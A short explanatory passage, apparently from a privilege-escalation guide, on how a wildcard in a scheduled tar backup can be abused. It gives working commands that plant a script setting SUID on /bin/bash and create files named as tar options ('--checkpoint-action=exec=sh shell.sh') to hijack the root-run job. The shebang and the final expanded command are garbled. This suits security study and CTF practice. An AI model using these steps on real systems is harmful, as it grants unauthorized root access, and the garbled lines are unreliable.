Tasks with Wildcard

One of the mistakes that users may make is the addition of wildcard to a scheduled task command. Say for example when the user wants to zip the entire contents of a folder periodically, the user may add a * to the end of the command to include all the files that are dropped into that folder. The task scheduler command may look like this,

tar -zcf backup.tar.gz *

Now this can be problematic since when this command is executed the file names within the directory are substituted within the command and if a filename is structure like a command, then it gets executed along with this tar command.

Let us add files to the directory that appear like a command that modifies the SUID of the bash,

echo '#/!bin/bash' > shell.sh
echo 'chmod +s /bin/bash' >> shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1

This will create 3 files within the directory of which 2 filenames are basically commands that transform the tar command. So when the tar command executes finally, the command appears like this,

tar -zcf backup.tar.gz --checkpoint=1 --checkpoint=action=exec=sh shell.sh

After the scheduled task gets executed, the SUID of bash gets modified allowing the user to gain root shell.